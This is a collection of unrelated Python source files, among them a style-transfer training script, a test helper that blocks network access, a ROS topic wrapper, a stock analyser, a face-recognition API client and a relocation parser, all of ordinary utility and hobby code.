if not self.integrator.successful():
raise Exception("Integration failed")
self.x = x_new
self.t = tend
return x_new
def copy(self):
"""! Returns a copy of self, to use if want to compute in parallel
@returns a copy of self
"""
# set up a new integrator
return RKIntegrator(self._params)
@staticmethod
def _test_fun(t, y, args):
return [0.1 * np.cos(y[1]), -y[0]]
|
987,140 | 0e97cfa1d77d436ea8242b9ce69c30628f5b5d89 | MuniList = ['Ödeshög',
'Åtvidaberg',
'Boxholm',
'Finspång',
'Kinda',
'Linköping',
'Mjölby',
'Motala',
'Norrköping',
'Söderköping',
'Vadstena',
'Valdemarsvik',
'Ydre',
'Karlshamn',
'Karlskrona',
'Olofström',
'Ronneby',
'Sölvesborg',
'Älvdalen',
'Avesta',
'Borlänge',
'Falun',
'Gagnef',
'Hedemora',
'Leksand',
'Ludvika',
'Malung',
'Mora',
'Orsa',
'Rättvik',
'Säter',
'Smedjebacken',
'Vansbro',
'Bollnäs',
'Gävle',
'Hofors',
'Hudiksvall',
'Ljusdal',
'Nordanstig',
'Ockelbo',
'Ovanåker',
'Söderhamn',
'Sandviken',
'Gotland',
'Falkenberg',
'Halmstad',
'Hylte',
'Kungsbacka',
'Laholm',
'Varberg',
'Östersund',
'Åre',
'Berg',
'Bräcke',
'Härjedalen',
'Krokom',
'Ragunda',
'Strömsund',
'Aneby',
'Eksjö',
'Gislaved',
'Gnosjö',
'Jönköping',
'Nässjö',
'Sävsjö',
'Tranås',
'Värnamo',
'Vaggeryd',
'Vetlanda',
'Borgholm',
'Emmaboda',
'Högsby',
'Hultsfred',
'Kalmar',
'Mönsterås',
'Mörbylånga',
'Nybro',
'Oskarshamn',
'Torsås',
'Västervik',
'Vimmerby',
'Älmhult',
'Alvesta',
'Lessebo',
'Ljungby',
'Markaryd',
'Tingsryd',
'Uppvidinge',
'Växjö',
'Överkalix',
'Övertorneå',
'Älvsbyn',
'Arjeplog',
'Arvidsjaur',
'Boden',
'Gällivare',
'Haparanda',
'Jokkmokk',
'Kalix',
'Kiruna',
'Luleå',
'Pajala',
'Piteå',
'Örebro',
'Askersund',
'Degerfors',
'Hällefors',
'Hallsberg',
'Karlskoga',
'Kumla',
'Laxå',
'Lekeberg',
'Lindesberg',
'Ljusnarsberg',
'Nora',
'Eskilstuna',
'Flen',
'Gnesta',
'Katrineholm',
'Nyköping',
'Oxelösund',
'Strängnäs',
'Trosa',
'Vingåker',
'Örkelljunga',
'Östra Göinge',
'Ängelholm',
'Åstorp',
'Båstad',
'Bjuv',
'Bromölla',
'Burlöv',
'Eslöv',
'Hässleholm',
'Höör',
'Höganäs',
'Hörby',
'Helsingborg',
'Kävlinge',
'Klippan',
'Kristianstad',
'Landskrona',
'Lomma',
'Lund',
'Malmö',
'Osby',
'Perstorp',
'Simrishamn',
'Sjöbo',
'Skurup',
'Staffanstorp',
'Svalöv',
'Svedala',
'Tomelilla',
'Trelleborg',
'Vellinge',
'Ystad',
'Österåker',
'Botkyrka',
'Danderyd',
'Ekerö',
'Haninge',
'Huddinge',
'Järfälla',
'Lidingö',
'Nacka',
'Norrtälje',
'Nykvarn',
'Nynäshamn',
'Södertälje',
'Salem',
'Sigtuna',
'Sollentuna',
'Solna',
'Stockholm',
'Sundbyberg',
'Täby',
'Tyresö',
'Upplands-Bro',
'Upplands-Väsby',
'Värmdö',
'Vallentuna',
'Vaxholm',
'Östhammar',
'Älvkarleby',
'Enköping',
'Håbo',
'Knivsta',
'Tierp',
'Uppsala',
'Årjäng',
'Arvika',
'Eda',
'Filipstad',
'Forshaga',
'Grums',
'Hagfors',
'Hammarö',
'Karlstad',
'Kil',
'Kristinehamn',
'Munkfors',
'Säffle',
'Storfors',
'Sunne',
'Torsby',
'Åsele',
'Bjurholm',
'Dorotea',
'Lycksele',
'Malå',
'Nordmaling',
'Norsjö',
'Robertsfors',
'Skellefteå',
'Sorsele',
'Storuman',
'Umeå',
'Vännäs',
'Vilhelmina',
'Vindeln',
'Örnsköldsvik',
'Ånge',
'Härnösand',
'Kramfors',
'Sollefteå',
'Sundsvall',
'Timrå',
'Arboga',
'Fagersta',
'Hallstahammar',
'Heby',
'Köping',
'Kungsör',
'Norberg',
'Sala',
'Skinnskatteberg',
'Surahammar',
'Västerås',
'Öckerö',
'Åmål',
'Ale',
'Alingsås',
'Bengtsfors',
'Bollebygd',
'Borås',
'Dals-Ed',
'Essunga',
'Färgelanda',
'Falköping',
'Göteborg',
'Götene',
'Grästorp',
'Gullspång',
'Härryda',
'Habo',
'Herrljunga',
'Hjo',
'Karlsborg',
'Kungälv',
'Lerum',
'Lidköping',
'Lilla Edet',
'Lysekil',
'Mölndal',
'Mariestad',
'Mark',
'Mellerud',
'Mullsjö',
'Munkedal',
'Orust',
'Partille',
'Skövde',
'Skara',
'Sotenäs',
'Stenungsund',
'Strömstad',
'Svenljunga',
'Töreboda',
'Tanum',
'Tibro',
'Tidaholm',
'Tjörn',
'Tranemo',
'Trollhättan',
'Uddevalla',
'Ulricehamn',
'Vänersborg',
'Vårgårda',
'Vara'] |
987,141 | 70fea78b60e9485481b4b7fe05dcc16f126c0d0b | import matplotlib.pyplot as plt
def get_points(coordinates):
x_points = []
y_points = []
z_points = []
for coordinate in coordinates:
x_points.append(coordinate[0])
y_points.append(-coordinate[1])
z_points.append(coordinate[2])
return x_points, y_points, z_points
def visualize_coordinates(coordinates, path=None):
ax = plt.axes(projection='3d')
ax.set_xlabel('x axis')
ax.set_ylabel('y axis')
ax.set_zlabel('z axis')
x_points, y_points, z_points = get_points(coordinates)
ax.scatter3D(x_points, y_points, z_points, s=1)
if path:
x_path_points, y_path_points, z_path_points = get_points(path)
ax.plot3D(x_path_points, y_path_points, z_path_points, 'red')
plt.show()
|
987,142 | f38f41653140d9f1b33834be929557526ce89b13 | class Solution(object):
def containsDuplicate(self, nums):
for i in range(0,nums.__len__()-1):
for j in range(i+1,nums.__len__()):
if nums[i] == nums[j]:
return True
return False
s = Solution()
print(s.containsDuplicate([1,2,3,1]))
|
987,143 | 20fd374f3c607992f9ba724402db5ce45325d53d | import argparse
from pathlib import Path
import torch
import torch.backends.cudnn as cudnn
import torch.nn as nn
import torch.utils.data as data
from PIL import Image, ImageFile
from tensorboardX import SummaryWriter
from torchvision import transforms
from tqdm import tqdm
import net
from sampler import InfiniteSamplerWrapper
cudnn.benchmark = True
Image.MAX_IMAGE_PIXELS = None # Disable DecompressionBombError
# Disable OSError: image file is truncated
ImageFile.LOAD_TRUNCATED_IMAGES = True
def train_transform():
transform_list = [
transforms.Resize(size=(512, 512)),
transforms.RandomCrop(256),
transforms.ToTensor()
]
return transforms.Compose(transform_list)
class FlatFolderDataset(data.Dataset):
def __init__(self, root, transform):
super(FlatFolderDataset, self).__init__()
self.root = root
self.paths = list(Path(self.root).glob('*'))
self.transform = transform
def __getitem__(self, index):
path = self.paths[index]
img = Image.open(str(path)).convert('RGB')
img = self.transform(img)
return img
def __len__(self):
return len(self.paths)
def name(self):
return 'FlatFolderDataset'
def adjust_learning_rate(optimizer, iteration_count):
"""Imitating the original implementation"""
lr = args.lr / (1.0 + args.lr_decay * iteration_count)
for param_group in optimizer.param_groups:
param_group['lr'] = lr
parser = argparse.ArgumentParser()
# Basic options
parser.add_argument('--content_dir', type=str, required=True,
help='Directory path to a batch of content images')
parser.add_argument('--style_dir', type=str, required=True,
help='Directory path to a batch of style images')
parser.add_argument('--vgg', type=str, default='models/vgg_normalised.pth')
# training options
parser.add_argument('--save_dir', default='./experiments',
help='Directory to save the model')
parser.add_argument('--log_dir', default='./logs',
help='Directory to save the log')
parser.add_argument('--lr', type=float, default=1e-4)
parser.add_argument('--lr_decay', type=float, default=5e-5)
parser.add_argument('--max_iter', type=int, default=160000)
parser.add_argument('--batch_size', type=int, default=8)
parser.add_argument('--style_weight', type=float, default=10.0)
parser.add_argument('--content_weight', type=float, default=1.0)
parser.add_argument('--n_threads', type=int, default=16)
parser.add_argument('--save_model_interval', type=int, default=10000)
args = parser.parse_args()
device = torch.device('cuda')
save_dir = Path(args.save_dir)
save_dir.mkdir(exist_ok=True, parents=True)
log_dir = Path(args.log_dir)
log_dir.mkdir(exist_ok=True, parents=True)
writer = SummaryWriter(log_dir=str(log_dir))
decoder = net.decoder
vgg = net.vgg
vgg.load_state_dict(torch.load(args.vgg))
vgg = nn.Sequential(*list(vgg.children())[:31])
network = net.Net(vgg, decoder)
network.train()
network.to(device)
content_tf = train_transform()
style_tf = train_transform()
content_dataset = FlatFolderDataset(args.content_dir, content_tf)
style_dataset = FlatFolderDataset(args.style_dir, style_tf)
content_iter = iter(data.DataLoader(
content_dataset, batch_size=args.batch_size,
sampler=InfiniteSamplerWrapper(content_dataset),
num_workers=args.n_threads))
style_iter = iter(data.DataLoader(
style_dataset, batch_size=args.batch_size,
sampler=InfiniteSamplerWrapper(style_dataset),
num_workers=args.n_threads))
optimizer = torch.optim.Adam(network.decoder.parameters(), lr=args.lr)
for i in tqdm(range(args.max_iter)):
adjust_learning_rate(optimizer, iteration_count=i)
content_images = next(content_iter).to(device)
style_images = next(style_iter).to(device)
loss_c, loss_s = network(content_images, style_images)
loss_c = args.content_weight * loss_c
loss_s = args.style_weight * loss_s
loss = loss_c + loss_s
optimizer.zero_grad()
loss.backward()
optimizer.step()
writer.add_scalar('loss_content', loss_c.item(), i + 1)
writer.add_scalar('loss_style', loss_s.item(), i + 1)
if (i + 1) % args.save_model_interval == 0 or (i + 1) == args.max_iter:
state_dict = net.decoder.state_dict()
for key in state_dict.keys():
state_dict[key] = state_dict[key].to(torch.device('cpu'))
torch.save(state_dict, save_dir /
'decoder_iter_{:d}.pth.tar'.format(i + 1))
writer.close()
|
987,144 | b370f214906b42e48cf12096c66d76a404ba7d5e | import socket
import sys
from contextlib import contextmanager
import attr
try:
import pycurl
@attr.s(slots=True)
class Curl(object):
"""Proxy to real pycurl.Curl.
If `perform` is called then it will raise an error if network is disabled via `disable`
"""
handle = attr.ib(factory=pycurl.Curl)
def __getattribute__(self, item):
if _disable_pycurl and item == "perform":
raise RuntimeError("Network is disabled")
handle = object.__getattribute__(self, "handle")
return getattr(handle, item)
except ImportError:
pycurl = None
Curl = None
# `socket.socket` is not patched, because it could be needed for live servers (e.g. pytest-httpbin)
# But methods that could connect to remote are patched to prevent network access
_original_connect = socket.socket.connect
_original_connect_ex = socket.socket.connect_ex
# Global switch for pycurl disabling
_disable_pycurl = False
@attr.s(slots=True, hash=True)
class PyCurlWrapper(object):
"""Imitate pycurl module."""
def __getattribute__(self, item):
if item == "Curl":
return Curl
return getattr(pycurl, item)
def check_pycurl_installed(func):
"""No-op if pycurl is not installed."""
def inner(*args, **kwargs): # pylint: disable=inconsistent-return-statements
if pycurl is None:
return
return func(*args, **kwargs)
return inner
@check_pycurl_installed
def install_pycurl_wrapper():
sys.modules["pycurl"] = PyCurlWrapper()
@check_pycurl_installed
def uninstall_pycurl_wrapper():
sys.modules["pycurl"] = pycurl
def block_pycurl():
global _disable_pycurl # pylint: disable=global-statement
_disable_pycurl = True
def unblock_pycurl():
global _disable_pycurl # pylint: disable=global-statement
_disable_pycurl = False
def block_socket():
socket.socket.connect = network_guard
socket.socket.connect_ex = network_guard
def unblock_socket():
socket.socket.connect = _original_connect
socket.socket.connect_ex = _original_connect_ex
def network_guard(*args, **kwargs):
raise RuntimeError("Network is disabled")
def block():
block_socket()
# NOTE: Applying socket blocking makes curl hangs - it should be carefully patched
block_pycurl()
def unblock():
unblock_pycurl()
unblock_socket()
@contextmanager
def blocking_context():
"""Block connections via socket and pycurl.
NOTE:
Only connections to remotes are blocked in `socket`.
Local servers are not touched since it could interfere with live servers needed for tests (e.g. pytest-httpbin)
"""
block()
try:
yield
finally:
# an error could happen somewhere else when this ctx manager is on `yield`
unblock()
|
987,145 | 28577e593c1b30f298a83c2e3a44fb65a0ec5f08 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models
from django.contrib.auth.models import User
# Create your models here.
class Post(models.Model):
author = models.ForeignKey(User, verbose_name=u'Автор', related_name='posts')
date_created = models.DateTimeField(verbose_name=u'Дата публикации', auto_now_add=True)
title = models.CharField(verbose_name=u'Заголовок', max_length=140)
text = models.TextField(verbose_name=u'Текст')
def __unicode__(self):
return self.title
class Meta:
verbose_name = u'Пост'
verbose_name_plural = u'Посты'
ordering = ('-date_created', )
def get_cent_answers_channel_name(self):
return "post_%d"%self.id |
987,146 | 27953f4e4cbbea91e657843c4fd00de5469d281f | import os
import time
from thrid_session.gui_test.common.connect_DB import DBtools
class Setreport:
def __init__(self):
self.db=DBtools()
def write_report(self,version,planid,testtype,caseid,casetitle,result,error,screenshot):
testtime=time.strftime('%Y-%m-%d_%H:%M:%S',time.localtime(time.time()))
args=(version,planid,testtype,caseid,casetitle,
result,testtime,error,screenshot)
sql_write="insert into report(version,planid,testtype,caseid,casetitle,result,testtime,error,screenshot)" \
"values(%s,%s,%s,%s,%s,%s,%s,%s,%s)"
# print(sql_write)
self.db.cursor.execute(sql_write,args)
self.db.db.commit()
# self.db.cursor.close()
# self.db.db.close()
def read_report(self,version):
sql_all="select * from report where version = '%s'"%(version)
self.db.cursor.execute(sql_all)
results=self.db.cursor.fetchall() #返回全部数据,一个二维列表
if len(results)==0:
print('提示:本次测试没有测试结果产生')
return
#打开模板文件并读取内容,定位到当前文件的绝对路径
tempate_path=os.path.abspath('..')+'\\gui_test\\main\\HTML_report.html'
tempate=open(tempate_path,mode='r',encoding='utf-8')
content=tempate.read()
#获取版本信息并替换模板变量
version=results[0][1]
content=content.replace('$test-version',version)
#输入SQL语句获取用例数量
sql_base="select count(*) from report where version = "
#统计成功数量并替换模板变量
sql_pass=sql_base + "'%s' and result='成功'" %(version)
self.db.cursor.execute(sql_pass)
pass_count=self.db.cursor.fetchone()[0] #fetchone返回元组
content=content.replace('$pass-count',str(pass_count))
#统计失败数量并替换模板变量
sql_fail=sql_base + "'%s' and result = '失败'" %(version)
self.db.cursor.execute(sql_fail)
fail_count=self.db.cursor.fetchone()[0]
content=content.replace('$fail-count',str(fail_count))
#统计错误数量并替换模板变量
sql_error=sql_base + "'%s' and result = '错误'"%(version)
self.db.cursor.execute(sql_error)
error_count=self.db.cursor.fetchone()[0]
content=content.replace('$error-count',str(error_count))
#取得最后一个用例的执行时间并替换模板变量
sql_last_time="select testtime from report where version = '%s' order by id desc limit 0,1"%(version)
self.db.cursor.execute(sql_last_time)
last_time=self.db.cursor.fetchone()[0]
content=content.replace('$last-time',str(last_time))
content=content.replace('$test-date',str(last_time))
#取得所有执行结果数据并替换掉变量模板的$result
test_result=''
#循环遍历每一条结果记录,并最终生成HTML源码
for record in results: #results是二维元组
test_result+="<tr height='40'>"
test_result+="<td width='7%'>" + str(record[0]) + "</td>" #报告编号record[0]第一列
test_result += "<td width='9%'>" + record[2] + "</td>" #计划编号record[2]的第三列
test_result += "<td width='9%'>" + record[3] + "</td>" #测试类型record[3]的第四列
test_result += "<td width='7%'>" + record[4] + "</td>" #用例编号record[4]的第五列
test_result += "<td width='20%'>" + record[5] + "</td>" #用例描述record[5]的第六列
#根据不同测试结果生成不同颜色
if record[6]=='成功':
test_result += "<td width='7%' bgcolor='#A6FFA6'>" + record[6] + "</td>"
elif record[6]=='失败':
test_result += "<td width='7%' bgcolor='#FF9797'>" + record[6] + "</td>"
elif record[6]=='错误':
test_result += "<td width='7%' bgcolor='#FFED97'>" + record[6] + "</td>"
test_result+="<td width='16%'>" + str(record[7]) + "</td>" #执行时间record[7]第一列
test_result += "<td width='15%'>" + record[8] + "</td>" #错误信息record[8]的第一列
if record[9]=='无' or record[9] == '请检查用例库': #现场截图record[9]第一列
test_result += "<td width='10%'>" + record[9] + "</td>"
else:
test_result += "<td width='10%'><a href='" + record[9] + "'>查看截图</a></td>"
test_result+="</tr>\r\n"
content=content.replace('$test-result',test_result)
#将最终测试结果报告写入目录的文件中
nowtime=time.strftime('%Y%m%d_%H%M%S',time.localtime(time.time()))
report_path=os.path.abspath('..')+'\\gui_test\\screen\\'+nowtime+'_report.html'
report=open(report_path,mode='w',encoding='utf-8')
report.write(content)
#关闭相关的文件和数据库连接
report.close()
self.db.cursor.close()
self.db.db.close()
if __name__ == '__main__':
tctest=Setreport()
tctest.write_report('pc端','None','GUI','None','None','错误','找不到用例','无')
# tctest.read_report('1.01')
tctest.read_report('pc端')
|
987,147 | ae816287019df178848faa842decb2eedc14eacb | #line graph
import matplotlib.pyplot as plt
#line 1 points
x1 = [1, 2, 3]
y1 = [2, 4, 1]
plt.plot(x1, y1, label="line 1")
#line 2 points
x2 = [1, 2, 3]
y2 = [4, 1, 3]
plt.plot(x2, y2, label="line 2")
#naming the x and y axis
plt.xlabel('x - axis')
plt.ylabel('y - axis')
#graph title
plt.title('Two lines graph')
# show a legend on the plot
plt.legend()
plt.show() |
987,148 | cfaff6f8d0405857ae18c67572d0f80407508d19 | from __future__ import absolute_import
import time
import roslib
import rospy
from importlib import import_module
from collections import deque, OrderedDict
from .message_conversion import get_msg, get_msg_dict
def get_topic_msg(topic):
return get_msg(topic.rostype)
def get_topic_msg_dict(topic):
return get_msg_dict(topic.rostype)
class TopicBackTimeout(Exception):
pass
class TopicBack(object):
"""
TopicBack is the class handling conversion from Python to ROS Topic
Requirement : Only one topicBack per actual ROS Topic.
Since we connect to an already existing ros topic, our number of connections should never drop under 1
"""
# We need some kind of instance count here since system state returns only one node instance
# as publisher for multiple publisher in this process.
# This is used in ros_interface update to determine
# if we are the only last ones publishing / subscribing to this topic ( usually the count will be just 1 )
# TO have this working properly with multiple instance, we need a central place to keep that
pub_instance_count = {}
sub_instance_count = {}
# a solution that works multiprocess
IF_TOPIC_PARAM = 'pyros_if_topics'
@staticmethod
def _create_pub(name, rostype, *args, **kwargs):
"""
Creating a publisherm and adding it to the pub instance count.
Useful in case we need multiple similar publisher in one process ( tests, maybe future cases )
:return: the ros publisher
"""
# counting publisher instance per topic name
if name in TopicBack.pub_instance_count.keys():
TopicBack.pub_instance_count[name] += 1
else:
TopicBack.pub_instance_count[name] = 1
return rospy.Publisher(name, rostype, *args, **kwargs)
@staticmethod
def _remove_pub(pub):
"""
Removing a publisher and substracting it from the pub instance count.
:return: None
"""
# counting publisher instance per topic name
TopicBack.pub_instance_count[pub.name] -= 1
# Be aware of https://github.com/ros/ros_comm/issues/111
return pub.unregister()
@staticmethod
def _create_sub(name, rostype, topic_callback, *args, **kwargs):
"""
Creating a subscriber and adding it to the pub instance count.
Static and Functional style so we can call it from anywhere (tests).
Useful in case we need multiple similar publisher in one process ( tests, maybe future cases )
:return: the subscriber
"""
# counting subscriber instance per topic name
if name in TopicBack.sub_instance_count.keys():
TopicBack.sub_instance_count[name] += 1
else:
TopicBack.sub_instance_count[name] = 1
return rospy.Subscriber(name, rostype, topic_callback, *args, **kwargs)
@staticmethod
def _remove_sub(sub):
"""
Creating a publisher and adding it to the pub instance count.
Useful in case we need multiple similar publisher in one process ( tests, maybe future cases )
:return: None
"""
# counting publisher instance per topic name
TopicBack.sub_instance_count[sub.name] -= 1
# Be aware of https://github.com/ros/ros_comm/issues/111
return sub.unregister()
def __init__(self, topic_name, topic_type, queue_size=1, start_timeout=2):
self.name = topic_name
# TODO : think about if we enforce fullname before reaching this deep in the code
# Any benefit with relative names ?
# getting the fullname to make sure we start with /
self.fullname = self.name if self.name.startswith('/') else '/' + self.name
topic_type_module, topic_type_name = tuple(topic_type.split('/'))
roslib.load_manifest(topic_type_module)
msg_module = import_module(topic_type_module + '.msg')
self.rostype_name = topic_type
self.rostype = getattr(msg_module, topic_type_name)
self.msgtype = get_topic_msg_dict(self)
self.msg = deque([], queue_size)
self.pub = None
self.pub = self._create_pub(self.fullname, self.rostype, queue_size=1)
# CAREFUL ROS publisher doesnt guarantee messages to be delivered
# stream-like design spec -> loss is acceptable.
self.sub = self._create_sub(self.fullname, self.rostype, self.topic_callback)
# Advertising ROS system wide, which topic are interfaced with this process
# TODO : make this thread safe
if_topics = rospy.get_param('~' + TopicBack.IF_TOPIC_PARAM, [])
rospy.set_param('~' + TopicBack.IF_TOPIC_PARAM, if_topics + [self.fullname])
# Here making sure the publisher / subscriber pair is actually connected
# before returning to ensure RAII
start = time.time()
timeout = start_timeout
while time.time() - start < timeout and (
self.pub.get_num_connections() < 1 or
self.sub.get_num_connections() < 1
):
rospy.rostime.wallsleep(1)
if start - time.time() > timeout:
raise TopicBackTimeout()
self.empty_cb = None
def cleanup(self):
"""
Launched when we want to whithhold this interface instance
:return:
"""
# Removing the ROS system wide advert about which topic are interfaced with this process
# TODO : lock this for concurrent access
if_topics = rospy.get_param('~' + TopicBack.IF_TOPIC_PARAM, [])
if_topics.remove(self.fullname)
rospy.set_param('~' + TopicBack.IF_TOPIC_PARAM, if_topics)
# cleanup pub and sub, so we can go through another create / remove cycle properly
self._remove_pub(self.pub)
self._remove_sub(self.sub)
def asdict(self):
"""
Here we provide a dictionary suitable for a representation of the Topic instance
the main point here is to make it possible to transfer this to remote processes.
We are not interested in pickleing the whole class with Subscriber and Publisher
:return:
"""
return OrderedDict({
'name': self.name,
'fullname': self.fullname,
'msgtype': self.msgtype,
'rostype_name': self.rostype_name,
})
def publish(self, msg):
# enforcing correct type to make send / receive symmetric and API less magical
# Doing message conversion visibly in code before sending into the black magic tunnel sounds like a good idea
if isinstance(msg, self.rostype):
self.pub.publish(msg) # This should return False if publisher not fully setup yet
return True # because the return spec of rospy's publish is not consistent
return False
def get(self, num=0, consume=False):
if not self.msg:
return None
res = None
#TODO : implement returning multiple messages ( paging/offset like for long REST requests )
if consume:
res = self.msg.popleft()
if 0 == len(self.msg) and self.empty_cb:
self.empty_cb()
#TODO : CHECK that we can survive here even if we get dropped from the topic list
else:
res = self.msg[0]
return res
#returns the number of unread message
def unread(self):
return len(self.msg)
def set_empty_callback(self, cb):
self.empty_cb = cb
def topic_callback(self, msg):
self.msg.appendleft(msg)
|
987,149 | a70b46f57292fbc40f5968a54c60da82b7e9e3c3 | from NseStockAnalyser.utils import *
from pprint import pprint
def index_52_wk_lows():
index = get_index()
# slicing off 1st index of the data list since it contains index data
nifty50_stocks_data_json = get_index_stock_data_json(index)['data'][1:]
# try:
# data_pts = int(input(f'Enter number of data points (Input Range : 1 - {len(nifty50_stocks_data_json)}): '))
# if not 1 <= data_pts <= len(nifty50_stocks_data_json):
# raise ValueError
# except ValueError:
# print('Please enter a valid input')
# return
stocks_list = []
for stocks in nifty50_stocks_data_json:
try:
code = stocks['meta']['symbol']
except KeyError:
code = stocks['symbol']
cur_price = float(stocks['lastPrice'])
yr_low = float(stocks['yearLow'])
yr_high = float(stocks['yearHigh'])
price_diff_from_low = round(cur_price - yr_low, 2)
price_diff_from_high = round(yr_high - cur_price, 2)
percent_above_low = round((price_diff_from_low / yr_low) * 100, 2)
percent_below_high = round((price_diff_from_high / yr_high) * 100, 2)
best_buy_index = round(100 - ((price_diff_from_low / (yr_high - yr_low)) * 100), 2)
stocks_list.append({'code': code, 'cur_price': cur_price, 'yr_low': yr_low, 'yr_high': yr_high,
'price_diff_from_low': price_diff_from_low, 'price_diff_from_high': price_diff_from_high,
'percent_above_low': percent_above_low, 'percent_below_high': percent_below_high,
'best_buy_index': best_buy_index})
sort_types = ['% Above Low', '% Below High', 'Best Buy Index (100 - ((Price diff from low / high52 - low52) * 100))']
while True:
for i in range(0, len(sort_types)):
print(f'{i+1} : {sort_types[i]}')
try:
opt = int(input(f'Which sorting order you prefer? (Input Range 1 - {len(sort_types)}): '))
if not 1 <= opt <= len(sort_types):
raise ValueError
break
except ValueError:
print("Please Enter Valid Input")
if opt == 1:
stocks_list = sorted(stocks_list, key=lambda i: i['percent_above_low'])
elif opt == 2:
stocks_list = sorted(stocks_list, key=lambda i: i['percent_below_high'], reverse=True)
elif opt == 3:
stocks_list = sorted(stocks_list, key=lambda i: i['best_buy_index'], reverse=True)
df = pd.DataFrame(stocks_list)
df.columns = ['Stock Code', 'Current Price(INR)', '52 Week Low', '52 Week High', 'Current - Low', 'High - Current',
'% Above Low', '% Below High', 'Best Buy Index']
df.index = df.index + 1
pandasgui.show(df)
# print('\n')
# print(df.head(data_pts))
# print('\n')
|
987,150 | 0725780cd66c8295d8bceea129c2d7e3e1989b4b | #!/usr/bin/env python
# -*- coding: utf8 -*-
import time
import json
import logging
import requests
from collections import Counter
from qcloud_cos import CosClient, Auth, UploadFileRequest
from constants import *
youtu_log = logging.getLogger(__name__)
KNOWN = 'known'
UNKNOWN = 'unknown'
class YoutuException(BaseException):
pass
class YoutuManager(object):
def __init__(self, host, app_id, secret_id, secret_key, region, bucket):
self.cos_client = CosClient(int(app_id), secret_id, secret_key, region)
self._bucket = unicode(bucket)
self._host = host
def _url(self, path):
return "http://" + self._host + path
def _sign(self):
return Auth(self.cos_client.get_cred()).sign_more(
self._bucket, '', int(time.time()) + 30
)
def _params(self, **kwargs):
kwargs['appid'] = str(self.cos_client.get_cred().get_appid())
kwargs['bucket'] = self._bucket
return kwargs
def _upload_picture(self, local_path):
image_name = local_path.split('/')[-1]
remote_path = "/face/" + image_name
request = UploadFileRequest(self._bucket, unicode(remote_path), unicode(local_path), insert_only=0)
try:
result = self.cos_client.upload_file(request)
except Exception, e:
raise YoutuException("update file %s failed, %s" % (image_name, e))
return None
else:
youtu_log.debug("upload_file result:%s" % result)
source_url = result['data']['source_url']
return source_url
def _post(self, url, params):
headers = {
'Host': self._host,
'Content-Type': 'application/json',
'Authorization': self._sign()
}
json_data = json.dumps(params)
try:
response = requests.post(url, data=json_data, headers=headers)
except Exception, e:
raise YoutuException(
"http post error url=%s, data=%s, headers=%s. original error: %s" % (
url, json_data, headers, e
))
else:
return json.loads(response.text)
def create_person(self, image_url, person_id, group_id, person_name="", tag=""):
url = self._url('/face/newperson')
params = self._params(
url=image_url, group_ids=[group_id], person_id=str(person_id), person_name=person_name, tag=tag
)
print params
response_data = self._post(url, params)
print response_data
if response_data['code'] != 0:
raise YoutuException("create person failed, " + response_data['message'])
return response_data['data']['person_id']
def add_face(self, image_url, person_id, tag=""):
url = self._url('/face/addface')
params = self._params(
person_id=person_id,
urls=[image_url],
tag=tag
)
response_data = self._post(url, params)
print response_data
if response_data['code'] != 0:
raise YoutuException("add face to person %s failed, " % person_id + response_data['message'])
return person_id
def set_person_info(self, person_id, person_name):
url = self._url("/face/setinfo")
params = self._params(
person_id=person_id,
person_name=person_name
)
response_data = self._post(url, params)
if response_data['code'] != 0:
raise YoutuException("set person %s info failed, " % person_id + response_data['message'])
return response_data['data']['person_id']
def get_person_info(self, person_id):
url = self._url("/face/getinfo")
params = self._params(person_id=person_id)
response_data = self._post(url, params)
if response_data['code'] != 0:
raise YoutuException("get person %s info failed, " % person_id + response_data['message'])
return response_data['data']
def get_face_info(self, face_id):
url = self._url("/face/getfaceinfo")
params = self._params(face_id=face_id)
response_data = self._post(url, params)
if response_data['code'] != 0:
raise YoutuException("get face %s info failed, " % face_id + response_data['message'])
return response_data['data']
def face_detect(self, image_url):
url = self._url("/face/detect")
params = self._params(url=image_url, mode=1)
response_data = self._post(url, params)
return response_data
def face_identify(self, image_url, group_id):
url = self._url("/face/identify")
params = self._params(group_id=group_id, url=image_url)
response_data = self._post(url, params)
print response_data
if response_data['code'] != 0:
raise YoutuException("face %s identify %s failed, " % (image_url, group_id) + response_data['message'])
return response_data['data']['candidates']
def face_detect_upload(self, local_path):
image_url = self._upload_picture(local_path)
response = self.face_detect(image_url)
if response['code'] == 0: pass
return image_url
def face_identify_one(self, image_url):
candidates = self.face_identify(image_url, "known") + self.face_identify(image_url, "unknown")
candidate = {}
for c in candidates:
if c['confidence'] > 60 and c['confidence'] > candidate.get('confidence', 0):
candidate = c
return candidate
python
|
987,151 | 24342b381129d808ba0d4cedc9bb8061e0f39f08 | from dataclasses import dataclass
from typing import Dict
import spimdisasm
import tqdm
from intervaltree import Interval, IntervalTree
from util import log, options, symbols
@dataclass
class Reloc:
rom_address: int
reloc_type: str
symbol_name: str
addend: int = 0
all_relocs: Dict[int, Reloc] = {}
def add_reloc(reloc: Reloc):
all_relocs[reloc.rom_address] = reloc
def initialize():
global all_relocs
all_relocs = {}
for path in options.opts.reloc_addrs_paths:
if not path.exists():
continue
with path.open() as f:
sym_addrs_lines = f.readlines()
for line_num, line in enumerate(
tqdm.tqdm(sym_addrs_lines, desc=f"Loading relocs ({path.stem})")
):
line = line.strip()
# Allow comments
line = line.split("//")[0]
line = line.strip()
if line == "":
continue
rom_addr = None
reloc_type = None
symbol_name = None
addend = None
for info in line.split(" "):
if ":" not in info:
continue
if info.count(":") > 1:
log.parsing_error_preamble(path, line_num, line)
log.write(f"Too many ':'s in '{info}'")
log.error("")
attr_name, attr_val = info.split(":")
if attr_name == "":
log.parsing_error_preamble(path, line_num, line)
log.write(
f"Missing attribute name in '{info}', is there extra whitespace?"
)
log.error("")
if attr_val == "":
log.parsing_error_preamble(path, line_num, line)
log.write(
f"Missing attribute value in '{info}', is there extra whitespace?"
)
log.error("")
# Non-Boolean attributes
try:
if attr_name == "rom":
rom_addr = int(attr_val, 0)
continue
if attr_name == "reloc":
reloc_type = attr_val
continue
if attr_name == "symbol":
symbol_name = attr_val
continue
if attr_name == "addend":
addend = int(attr_val, 0)
continue
except:
log.parsing_error_preamble(path, line_num, line)
log.write(f"value of attribute '{attr_name}' could not be read:")
log.write("")
raise
if rom_addr is None:
log.parsing_error_preamble(path, line_num, line)
log.error(f"Missing required 'rom' attribute for reloc")
if reloc_type is None:
log.parsing_error_preamble(path, line_num, line)
log.error(f"Missing required 'reloc' attribute for reloc")
if symbol_name is None:
log.parsing_error_preamble(path, line_num, line)
log.error(f"Missing required 'symbol' attribute for reloc")
reloc = Reloc(rom_addr, reloc_type, symbol_name)
if addend is not None:
reloc.addend = addend
